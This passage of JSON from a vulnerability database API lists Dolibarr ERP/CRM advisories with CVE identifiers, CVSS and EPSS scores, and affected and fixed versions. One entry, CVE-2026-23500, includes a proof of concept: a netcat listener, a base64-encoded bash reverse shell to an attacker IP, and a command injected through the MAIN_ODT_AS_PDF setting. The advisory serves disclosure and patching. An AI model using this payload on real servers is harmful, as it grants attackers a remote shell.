,{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10095","GHSA-p2fm-8rhj-58fr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w8pm-m6yc-5bfb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/34571?format=json","vulnerability_id":"VCID-wa9k-affu-zuen","summary":"Cross-site Scripting (XSS) in dolibarr/dolibarr\nCross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.3055","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c"},{"reference_url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842"},{"reference_url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49","reference_id":"GHSA-9pjf-jw9q-fx49","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66950?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.5"}],"aliases":["CVE-2023-5842","GHSA-9pjf-jw9q-fx49"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wa9k-affu-zuen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15579?format=json","vulnerability_id":"VCID-whjj-q5zp-tfef","summary":"Dolibarr user with permission to edit PHP content can bypass filtering to restrict dangerous PHP functions\nIn the Website module of Dolibarr ERP & CRM 22.0.4 and below, the application uses blacklist-based filtering to restrict dangerous PHP functions related to system command execution. An authenticated user with permission to edit PHP content can bypass this filtering, resulting in full remote code execution with the ability to execute arbitrary operating system commands on the server.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31019","reference_id":"","reference_type":"","scores":[{"value":"0.00119","scoring_system":"epss","scoring_elements":"0.30538","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31019"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T18:23:29Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31019/README.md"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31019"},{"reference_url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc","reference_id":"GHSA-j2g9-rprv-hrhc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-j2g9-rprv-hrhc"}],"fixed_packages":[],"aliases":["CVE-2026-31019","GHSA-j2g9-rprv-hrhc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-whjj-q5zp-tfef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15759?format=json","vulnerability_id":"VCID-x3pg-81y2-ruga","summary":"Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration\n### Summary\nAn authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.\n\n### Details\nThe vulnerability is located in `htdocs/includes/odtphp/odf.php`.\nWhen the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.\n\nCode snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):\n```php\n$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);\n// ...\nexec($command, $output_arr, $retval);\n```\n\nWhile the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.\n\n### PoC\n**Prerequisites:**\n1. Login as an Administrator.\n2. Ensure the \"Commercial Proposals\" module is enabled and \"ODT templates\" are activated in its setup.\n\n**Steps to reproduce (Reverse Shell):**\n\n1.  Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):\n   ```bash\n   nc -lvnp 4445\n   ```\n\n2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:\n   ```bash\n   # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\n   echo \"bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\" | base64\n   # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK\n   ```\n\n3. Navigate to **Home -> Setup -> Other Setup**.\n\n4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:\n   ```bash\n   jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash\n   ```\n   *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*\n<img width=\"1898\" height=\"696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316\" />\n\n5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.\n<img width=\"1907\" height=\"668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242\" />\n<img width=\"1858\" height=\"346\" alt=\"image\" src=\"https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7\" />\n<img width=\"848\" height=\"183\" alt=\"image\" src=\"https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1\" />\n\n6. Check the netcat listener. A connection will be established, granting a shell on the server:\n \n<img width=\"616\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37\" />\n\n\n### Impact\n**Remote Code Execution (RCE).**\nAn attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:\n- Reading sensitive configuration files (database credentials).\n- Modifying application code.\n- Full system compromise depending on server configuration (e.g., docker escape, pivoting).\n\n---\n\n### Credits\nReported by Łukasz Rybak","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37427","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-23500"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-18T03:06:09Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-23500"},{"reference_url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w","reference_id":"GHSA-w5j3-8fcr-h87w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-w5j3-8fcr-h87w"}],"fixed_packages":[],"aliases":["CVE-2026-23500","GHSA-w5j3-8fcr-h87w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x3pg-81y2-ruga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35745?format=json","vulnerability_id":"VCID-xuha-w2yw-5fa6","summary":"File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-24T20:34:30Z/"}],"url":"https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38887_Dolibarr_AFU.pdf"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38887","reference_id":"","reference_type":"","scores":[{"value":"0.03022","scoring_system":"epss","scoring_elements":"0.86848","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-38887"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38887","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-38887"},{"reference_url":"https://github.com/advisories/GHSA-g8h7-mcp6-pf47","reference_id":"GHSA-g8h7-mcp6-pf47","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-g8h7-mcp6-pf47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67967?format=json","purl":"pkg:composer/dolibarr/dolibarr@17.0.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@17.0.1"}],"aliases":["CVE-2023-38887","GHSA-g8h7-mcp6-pf47"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xuha-w2yw-5fa6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53437?format=json","vulnerability_id":"VCID-y9z1-u3rc-yub6","summary":"Dolibarr SQL injection vulnerability\nDolibarr ERP/CRM is affected by multiple SQL injection vulnerabilities in versions through 7.0.0 via comm/propal/list.php (viewstatut parameter) or comm/propal/list.php (propal_statut parameter, aka search_statut parameter).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18260","reference_id":"","reference_type":"","scores":[{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44454","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-18260"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18260","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-18260"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2017-18260","GHSA-9986-6m4g-25f6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y9z1-u3rc-yub6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56049?format=json","vulnerability_id":"VCID-yrys-ch5x-23bv","summary":"Dolibarr Cross-site Scripting via the qty parameter in product/fournisseurs.php\nDolibarr ERP/CRM 3.0 through 10.0.3 allows XSS via the qty parameter to product/fournisseurs.php (product price screen).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19212","reference_id":"","reference_type":"","scores":[{"value":"0.01154","scoring_system":"epss","scoring_elements":"0.78831","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-19212"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://herolab.usd.de/en/security-advisories","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/en/security-advisories"},{"reference_url":"https://herolab.usd.de/security-advisories/usd-2019-0054","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://herolab.usd.de/security-advisories/usd-2019-0054"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19212","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-19212"},{"reference_url":"https://www.dolibarr.org/forum/dolibarr-changelogs","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.dolibarr.org/forum/dolibarr-changelogs"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/443000?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5